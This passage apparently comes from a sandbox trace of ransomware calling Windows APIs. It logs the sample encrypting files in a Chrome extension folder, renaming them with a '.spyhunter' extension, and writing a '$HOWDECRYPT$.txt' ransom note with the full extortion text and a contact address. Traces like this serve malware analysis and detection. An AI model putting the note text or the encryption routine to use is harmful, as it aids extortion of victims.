data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.spyhunter")) returned 1 [0157.701] GetProcessHeap () returned 0x2c0000 [0157.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.701] GetProcessHeap () returned 0x2c0000 [0157.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.702] GetProcessHeap () returned 0x2c0000 [0157.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24328 | out: hHeap=0x2c0000) returned 1 [0157.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.703] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.703] WriteFile (in: hFile=0xb0, lpBuffer=0x248eb77*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248eca0, lpOverlapped=0x0 | out: lpBuffer=0x248eb77*, lpNumberOfBytesWritten=0x248eca0*=0x127, lpOverlapped=0x0) returned 1 [0157.704] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.704] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248eca0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248eca0*=0x2ac, lpOverlapped=0x0) returned 1 [0157.704] CloseHandle (hObject=0xb0) returned 1 [0157.704] GetProcessHeap () returned 0x2c0000 [0157.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24190 | out: hHeap=0x2c0000) returned 1 [0157.704] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec40 | out: pbBuffer=0x248ec40) returned 1 [0157.704] GetProcessHeap () returned 0x2c0000 [0157.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.704] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec38*=0x30) returned 1 [0157.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0157.705] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.705] GetProcessHeap () returned 0x2c0000 [0157.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.705] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248ebfc*=0x2800, lpOverlapped=0x0) returned 1 [0157.772] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.772] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248ebfc*=0x2800, lpOverlapped=0x0) returned 1 [0157.772] GetProcessHeap () returned 0x2c0000 [0157.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.772] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.772] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebfc, lpOverlapped=0x0 | out: lpBuffer=0x248ec3c*, lpNumberOfBytesWritten=0x248ebfc*=0x4, lpOverlapped=0x0) returned 1 [0157.813] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebfc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebfc*=0x30, lpOverlapped=0x0) returned 1 [0157.813] CloseHandle (hObject=0xb0) returned 1 [0157.813] GetProcessHeap () returned 0x2c0000 [0157.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.813] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.spyhunter") returned 174 [0157.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0157.815] GetProcessHeap () returned 0x2c0000 [0157.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.815] GetProcessHeap () returned 0x2c0000 [0157.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.815] GetProcessHeap () returned 0x2c0000 [0157.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f23ff8 | out: hHeap=0x2c0000) returned 1 [0157.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.816] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.816] WriteFile (in: hFile=0xb0, lpBuffer=0x248eb6f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec98, lpOverlapped=0x0 | out: lpBuffer=0x248eb6f*, lpNumberOfBytesWritten=0x248ec98*=0x127, lpOverlapped=0x0) returned 1 [0157.817] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.817] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec98, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec98*=0x2ac, lpOverlapped=0x0) returned 1 [0157.817] CloseHandle (hObject=0xb0) returned 1 [0157.817] GetProcessHeap () returned 0x2c0000 [0157.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e310 | out: hHeap=0x2c0000) returned 1 [0157.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec38 | out: pbBuffer=0x248ec38) returned 1 [0157.817] GetProcessHeap () returned 0x2c0000 [0157.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.818] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec30*=0x30) returned 1 [0157.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0157.818] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.818] GetProcessHeap () returned 0x2c0000 [0157.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.818] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.820] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.820] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.820] GetProcessHeap () returned 0x2c0000 [0157.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.820] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.820] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebf4, lpOverlapped=0x0 | out: lpBuffer=0x248ec34*, lpNumberOfBytesWritten=0x248ebf4*=0x4, lpOverlapped=0x0) returned 1 [0157.821] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebf4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebf4*=0x30, lpOverlapped=0x0) returned 1 [0157.821] CloseHandle (hObject=0xb0) returned 1 [0157.821] GetProcessHeap () returned 0x2c0000 [0157.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.821] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.spyhunter") returned 174 [0157.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.spyhunter")) returned 1 [0157.822] GetProcessHeap () returned 0x2c0000 [0157.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.822] GetProcessHeap () returned 0x2c0000 [0157.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.823] GetProcessHeap () returned 0x2c0000 [0157.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e178 | out: hHeap=0x2c0000) returned 1 [0157.823] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec30 | out: pbBuffer=0x248ec30) returned 1 [0157.823] GetProcessHeap () returned 0x2c0000 [0157.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.823] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec28*=0x30) returned 1 [0157.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.824] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0157.824] StrStrW (lpFirst="mirroring_webrtc.js", lpSrch=".txt") returned 0x0 [0157.824] GetProcessHeap () returned 0x2c0000 [0157.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.824] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebec*=0x941, lpOverlapped=0x0) returned 1 [0157.844] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff6bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.844] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x941, lpNumberOfBytesWritten=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebec*=0x941, lpOverlapped=0x0) returned 1 [0157.844] GetProcessHeap () returned 0x2c0000 [0157.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.844] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.844] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x248ec2c*, lpNumberOfBytesWritten=0x248ebec*=0x4, lpOverlapped=0x0) returned 1 [0157.844] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebec*=0x30, lpOverlapped=0x0) returned 1 [0157.844] CloseHandle (hObject=0xb0) returned 1 [0157.844] GetProcessHeap () returned 0x2c0000 [0157.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.845] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.spyhunter") returned 168 [0157.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.spyhunter")) returned 1 [0157.846] GetProcessHeap () returned 0x2c0000 [0157.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.851] GetProcessHeap () returned 0x2c0000 [0157.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.851] GetProcessHeap () returned 0x2c0000 [0157.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22160 | out: hHeap=0x2c0000) returned 1 [0157.851] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec30 | out: pbBuffer=0x248ec30) returned 1 [0157.851] GetProcessHeap () returned 0x2c0000 [0157.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.851] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec28*=0x30) returned 1 [0157.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0157.852] StrStrW (lpFirst="mirroring_hangouts.js", lpSrch=".txt") returned 0x0 [0157.852] GetProcessHeap () returned 0x2c0000 [0157.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.852] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebec*=0x2800, lpOverlapped=0x0) returned 1 [0157.939] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.939] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebec*=0x2800, lpOverlapped=0x0) returned 1 [0157.940] GetProcessHeap () returned 0x2c0000 [0157.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.940] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.940] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x248ec2c*, lpNumberOfBytesWritten=0x248ebec*=0x4, lpOverlapped=0x0) returned 1 [0158.047] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebec*=0x30, lpOverlapped=0x0) returned 1 [0158.047] CloseHandle (hObject=0xb0) returned 1 [0158.826] GetProcessHeap () returned 0x2c0000 [0158.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.826] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.spyhunter") returned 170 [0158.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.spyhunter")) returned 1 [0158.828] GetProcessHeap () returned 0x2c0000 [0158.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 